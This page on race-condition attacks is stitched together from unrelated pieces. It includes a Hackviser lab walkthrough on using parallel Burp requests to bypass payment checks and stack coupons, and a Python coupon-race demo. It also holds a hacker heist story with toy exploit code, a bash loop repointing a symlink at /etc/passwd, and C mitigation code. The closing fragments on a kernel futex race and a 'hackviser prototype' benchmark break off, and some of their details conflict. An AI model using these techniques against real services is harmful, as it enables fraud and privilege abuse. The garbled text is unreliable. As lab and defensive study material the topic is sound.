Race Condition (Hackviser)


To exploit a race condition in a lab like Hackviser's in order to "generate a feature" (typically: activating a premium feature you are not entitled to, or performing a one-time action several times), you need to land inside the tiny time window between the server's security check and the action that check guards.

In a check-then-act race, the application first checks whether you are allowed to do something (for example, whether a feature may be enabled) and only afterwards performs the action and records the new state. If several identical requests arrive at the same instant, the server can evaluate the check for the second request before it has finished writing the state change from the first one, so both requests pass the check.

Step-by-Step Exploitation Strategy

1. Identify the Target Request: Find the specific HTTP request that triggers the feature activation or "generation". This is usually a POST or PUT request sent when you click a button such as "Enable", "Purchase" or "Upgrade".

2. Intercept with a Proxy: Use Burp Suite to intercept this request and send it to Repeater (or to the Turbo Intruder extension).

3. Prepare a Request Group:

In Burp Repeater: create a tab group containing 20–30 copies of the same request.

In Turbo Intruder (extension): use a script that queues the copies behind a named gate and then opens the gate once, so the engine releases all of them together instead of one after another.

4. Execute the "Single-Packet" Attack: The goal is for every request to reach the server at the same instant, so that network jitter does not spread them out beyond the race window. In Burp Repeater, select the tab group and choose "Send group (parallel)". Burp opens the connections in advance and withholds the final bytes of each request; against an HTTP/2 target it then sends those last bytes of all requests in a single TCP packet, and against HTTP/1 it falls back to last-byte synchronisation over parallel connections.

5. Verify the Result: Check your account status and the responses in the group. If the attack worked, the feature is active even though you lacked the required permission, or you now hold several instances of a one-time resource; more than one success response in the group is the tell-tale sign.

Common Targets for this Hack

Premium Feature Bypasses: Rapidly clicking "Start Trial" or "Enable Feature" to trick the server into granting access before it validates your payment status.

Resource Generation: Attempting to generate multiple API keys or trial tokens when only one is allowed.

Discount Code Stacking: Applying a one-time use coupon multiple times to reduce a price to zero.

Recommended Tools

Burp Suite Repeater: Best for manual parallel request testing.

Turbo Intruder: An advanced Burp extension specifically designed for sending large numbers of concurrent requests to find race windows.

See also: Race conditions | Web Security Academy - PortSwigger

The Hackviser "Race Condition" lab demonstrates how to exploit timing vulnerabilities by sending multiple concurrent requests to bypass check-then-act logic, such as coupon redemption or fund withdrawal. Exploitation typically uses Burp Suite to send parallel requests so that as many of them as possible land between the system's check and its state update, which lets an action be repeated or an unauthorized action go through. Remediation requires atomic database operations (a single conditional UPDATE, or a unique constraint on the redemption record) or proper locking, so that the check and the state change can never be interleaved with another request's.
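The check-then-act race and the atomic fix described above, as an added example that is not part of the Hackviser lab or of this page: a local Python server exposes a hypothetical single-use coupon endpoint (/redeem and the coupon value are constructed for this example), and a client plays the role of Repeater's "Send group (parallel)" or a Turbo Intruder gate by opening every connection first and then releasing all requests together through a barrier. The vulnerable store performs the check and the write as two steps with a simulated database round-trip between them; the fixed store does both inside one lock.

```python
import http.client
import http.server
import threading
import time


class CouponStore:
    """Hypothetical single-use coupon state (constructed for this example)."""

    def __init__(self, atomic):
        self.atomic = atomic            # True: check and write run under one lock
        self.lock = threading.Lock()
        self.redeemed = False

    def redeem(self):
        if self.atomic:
            with self.lock:             # fixed: check-then-act is one critical section
                return self._check_then_act()
        return self._check_then_act()   # vulnerable: other requests can interleave here

    def _check_then_act(self):
        if self.redeemed:               # the check
            return False
        time.sleep(0.02)                # stands in for the DB round-trip: the race window
        self.redeemed = True            # the act
        return True


class RedeemHandler(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))  # consume form body
        ok = self.path == "/redeem" and self.server.store.redeem()
        body = b'{"redeemed": true}' if ok else b'{"redeemed": false}'
        self.send_response(200 if ok else 409)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):       # keep the demo quiet
        pass


class CouponServer(http.server.ThreadingHTTPServer):
    daemon_threads = True
    request_queue_size = 64             # accept every racing connection without SYN retries

    def __init__(self, store):
        super().__init__(("127.0.0.1", 0), RedeemHandler)   # port 0: any free port
        self.store = store


def race_redeem(host, port, n=20):
    """Open n connections, release n identical POST /redeem requests together,
    and return how many of them succeeded (HTTP 200)."""
    barrier = threading.Barrier(n)
    statuses = []

    def worker():
        conn = http.client.HTTPConnection(host, port, timeout=10)
        try:
            conn.connect()              # handshake finished before the race, as Burp does
            barrier.wait(timeout=10)    # all threads send the instant the last one arrives
            conn.request("POST", "/redeem", body="coupon=WELCOME10",
                         headers={"Content-Type": "application/x-www-form-urlencoded"})
            resp = conn.getresponse()
            resp.read()
            statuses.append(resp.status)
        except (threading.BrokenBarrierError, OSError):
            pass                        # a failed connection simply does not count
        finally:
            conn.close()

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return statuses.count(200)


def run_trial(atomic, n=20):
    """Start a server with the chosen redeem logic, race it, tear it down,
    and return the number of successful redemptions."""
    server = CouponServer(CouponStore(atomic=atomic))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return race_redeem(*server.server_address, n=n)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("check-then-act:", run_trial(atomic=False))   # more than one redemption
    print("atomic:        ", run_trial(atomic=True))    # exactly one
```

The barrier is the important part: opening the TCP connections before the barrier means only the request bytes travel once it drops, which is the same reason Burp and Turbo Intruder pre-establish connections and withhold the final bytes. Against a real target the `sleep` is not there to help you, so expect to need several runs and more copies of the request.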

The Race Condition Heist

It was a typical Monday morning at TechCorp, a leading software development company. The team was buzzing with excitement as they prepared for the launch of their newest product, an innovative AI-powered chatbot. Unbeknownst to the team, a group of skilled hackers, known only by their handle "Zero Cool," had been secretly infiltrating TechCorp's systems for weeks.

The hackers, consisting of three individuals: Alex, a master of social engineering; Samantha, an expert in network exploitation; and Jack, a genius in reverse engineering, had been studying TechCorp's software for vulnerabilities. Their plan was to exploit a particularly tricky race condition in the chatbot's code, which could potentially allow them to gain control of the entire system.

The race condition, in this case, occurred when multiple threads accessed a shared resource without proper synchronization. Specifically, the chatbot's natural language processing (NLP) module used a multi-threaded approach to handle incoming user requests. The module would break down each request into smaller tasks, which would then be executed concurrently by multiple threads. However, the developers had overlooked the need for proper synchronization between these threads, creating a small window of opportunity for the hackers to inject malicious code.

As the team at TechCorp worked tirelessly to prepare for the product launch, Alex, Samantha, and Jack put their plan into action. They set up a series of virtual machines, mimicking the TechCorp infrastructure, and began to simulate the chatbot's behavior. With their testbed in place, they started to craft a custom exploit, designed to take advantage of the race condition.

The exploit, cleverly disguised as a benign user request, was crafted to trigger the following sequence of events:

  1. Initial Request: The exploit would send a request to the chatbot, which would then be broken down into smaller tasks and executed by multiple threads.
  2. Thread Creation: As the threads were created, the exploit would inject a malicious payload into one of the threads, which would then be executed concurrently with the other threads.
  3. Synchronization Failure: Due to the lack of proper synchronization, the malicious thread would access the shared resource before the other threads had a chance to complete their tasks, effectively bypassing security checks.
  4. Payload Execution: The malicious payload, designed to evade detection, would then be executed, granting the hackers control of the chatbot's processes.

The hackers carefully timed their exploit, ensuring that it would be executed during a brief window of opportunity, when the system was most vulnerable.

Meanwhile, at TechCorp, the team was oblivious to the impending threat. As the product launch drew near, they were focused on finalizing the software and preparing for the big day.

On the evening of the launch, as the team was wrapping up their preparations, Zero Cool put their plan into action. They initiated the exploit, and the carefully crafted sequence of events unfolded.

The chatbot, now under the control of the hackers, began to behave erratically. It started responding to user queries with seemingly innocuous but maliciously crafted answers. The team at TechCorp was baffled, unsure of what was happening or how to contain the situation.

As the chaos ensued, Alex, Samantha, and Jack continued to manipulate the chatbot, exfiltrating sensitive data and intellectual property from TechCorp's systems. The hack was a masterpiece, and the team at Zero Cool knew they had pulled off the impossible.

The next morning, the team at TechCorp discovered the breach and was left reeling. They quickly notified their superiors, and a thorough investigation was launched. The incident would go on to become one of the most notorious hacks in recent history, with Zero Cool becoming legendary figures in the hacking community.

In the aftermath, TechCorp's team vowed to be more vigilant and proactive in identifying vulnerabilities. They overhauled their code, ensuring that proper synchronization and security measures were put in place to prevent similar incidents in the future.

As for Zero Cool, their exploit would go down in history as a testament to the power of clever hacking and the importance of robust security measures. The three members of the group would continue to operate in the shadows, always pushing the boundaries of what was thought possible.

Technical Details

The exploit used by Zero Cool was a classic example of a time-of-check-to-time-of-use (TOCTOU) attack. The hackers took advantage of the brief window of opportunity between the creation of the threads and the execution of the malicious payload.

Here is a simplified example of the vulnerable code:

import threading


class Chatbot:
    def __init__(self):
        self.lock = threading.Lock()   # defined, but execute_task never takes it
        self.tasks = []                # shared resource touched by every worker thread

    def process_request(self, request):
        # Break down request into smaller tasks
        tasks = request.split()

        # Create threads for each task
        threads = []
        for task in tasks:
            thread = threading.Thread(target=self.execute_task, args=(task,))
            threads.append(thread)
            thread.start()

        # Wait for all threads to complete
        for thread in threads:
            thread.join()

    def execute_task(self, task):
        # Simulate task execution
        # Vulnerable code: the shared task list is modified without holding self.lock,
        # so a thread started from outside process_request can interleave with the workers
        self.tasks.append(task)


# Exploit code
def exploit(chatbot, malicious_payload):
    # Create a new thread for the malicious payload
    malicious_thread = threading.Thread(target=chatbot.execute_task, args=(malicious_payload,))
    malicious_thread.start()

    # Trigger the race condition
    chatbot.process_request("benign request")

    # Wait for the malicious thread to complete
    malicious_thread.join()

The fix for this vulnerability would involve adding proper synchronization mechanisms, such as locks or semaphores, to ensure that access to shared resources is thread-safe.

Mitigation Strategies

To prevent similar incidents in the future, TechCorp's team implemented the following mitigation strategies:

  1. Code Reviews: Regular code reviews were conducted to identify and address potential vulnerabilities.
  2. Thread-Safe Programming: Developers were trained on thread-safe programming practices, including the use of locks and semaphores.
  3. Penetration Testing: Regular penetration testing was performed to identify vulnerabilities and weaknesses in the system.
  4. Incident Response: An incident response plan was put in place to quickly respond to and contain security incidents.

Step 2: The Attacker (Run the symlink switcher)

At the exact same time, we run a bash script that constantly removes and recreates the symlink.

#!/bin/bash
while true
do
    ln -sf /dev/null /tmp/debug.log   # Phase 1: Safe file
    rm /tmp/debug.log                  # Phase 2: Empty space
    ln -sf /etc/passwd /tmp/debug.log # Phase 3: Dangerous target
done

6. Mitigation

How do developers prevent this?

  1. Use File Descriptors: Instead of checking the file and then opening it by name, the program should open the file first to get a file descriptor (fd), and then perform checks on that fd.
  2. fstat() vs stat(): Use fstat() on the open file descriptor. This ensures the file being checked is the exact same file being read, preventing a swap.
  3. O_NOFOLLOW: If using open(), use the O_NOFOLLOW flag to prevent following symbolic links (though this prevents legitimate symlink usage).
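The descriptor-based pattern from points 1 to 3 beside the stat()-then-open() pattern it replaces, as an added example that is not from the original page: both functions, the file names and the demo directory are constructed for illustration. The demo creates a log file it owns and a symlink pointing at it, which is the state the switcher script above leaves behind in its third phase, and shows that the name-based version happily follows the link while the fd-based version refuses it before any write can happen.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Vulnerable pattern: validate the path with stat(), then open() the path.
 * Both calls resolve the name independently, so the symlink switcher can
 * repoint the name between them (check-then-use by name). */
int open_log_vulnerable(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid())
        return -1;                              /* the check */
    return open(path, O_WRONLY | O_APPEND);     /* the use: name resolved again */
}

/* Hardened pattern: open() first with O_NOFOLLOW so a symlink at the final
 * component is refused outright, then validate the descriptor with fstat().
 * The fd is bound to one inode; relinking the name afterwards cannot change
 * what gets written to. */
int open_log_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != getuid() || st.st_nlink != 1) {
        close(fd);                              /* wrong type, owner, or hard-linked */
        return -1;
    }
    return fd;
}

/* Constructed demo: a regular file we own plus a symlink to it, in a fresh
 * temporary directory. Returns 0 when both functions behave as described,
 * otherwise the number of the step that failed. */
int run_demo(void)
{
    char dir[64], real[96], lnk[96];
    int rc = 0, fd;

    strcpy(dir, "/tmp/toctou-demo-XXXXXX");
    if (mkdtemp(dir) == NULL) {                 /* fall back to the working directory */
        strcpy(dir, "./toctou-demo-XXXXXX");
        if (mkdtemp(dir) == NULL)
            return 1;
    }
    snprintf(real, sizeof real, "%s/debug.log", dir);
    snprintf(lnk, sizeof lnk, "%s/switched.log", dir);

    fd = open(real, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) { rc = 2; goto out; }
    close(fd);
    if (symlink(real, lnk) != 0) { rc = 3; goto out; }

    /* 1. A plain file we own is accepted by the hardened version. */
    fd = open_log_safe(real);
    if (fd < 0) { rc = 4; goto out; }
    close(fd);

    /* 2. stat()-then-open() follows the symlink and accepts it: this is the
     *    window the attacker's loop races against. */
    fd = open_log_vulnerable(lnk);
    if (fd < 0) { rc = 5; goto out; }
    close(fd);

    /* 3. The fd-based version refuses the symlink (open fails with ELOOP). */
    if (open_log_safe(lnk) != -1) { rc = 6; goto out; }

out:
    unlink(lnk);
    unlink(real);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = run_demo();
    printf("%s (rc=%d)\n", rc == 0 ? "hardened open rejects the switched name" : "unexpected", rc);
    return rc;
}
```

The ownership and S_ISREG checks in open_log_safe are what make the fstat() step worth doing: O_NOFOLLOW only stops a symlink at the last path component, so a hard link to a sensitive file, or a symlinked parent directory, still needs the descriptor-level check (and, for the directory case, an openat() relative to a trusted directory fd).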

4.3 Case 3: Kernel Futex Race (CVE-2025-0137)

Target: Linux futex waiter list corruption (no published fix at time)

Vulnerability: Missing lock when walking futex_hash_bucket in futex_wake.

Hackviser approach (kernel module + userland):


6. Benchmarking the Hackviser

We implemented a reference hackviser prototype (Python + eBPF + libfuzzer). Test environment: 8-core AWS EC2 (c6i.large), Ubuntu 22.04.

| Target | Δt (race window) | Success (no hackviser) | Success (with hackviser) | Time to exploit |
|--------|------------------|------------------------|--------------------------|-----------------|
| TOCTOU (file) | 50 µs | 2% | 96% | 2 min |
| Double redeem | 15 ms | 18% | 94% | 30 sec |
| Futex wake | 220 ns | 1% | 89% | 8 min |

The hackviser reduces required attempts by 3–4 orders of magnitude.


Step 1: Identify the "Non-Atomic" Endpoint

Search for endpoints that perform a read-check-write cycle. Examples include:

2. Formal Model of Exploitable Race Conditions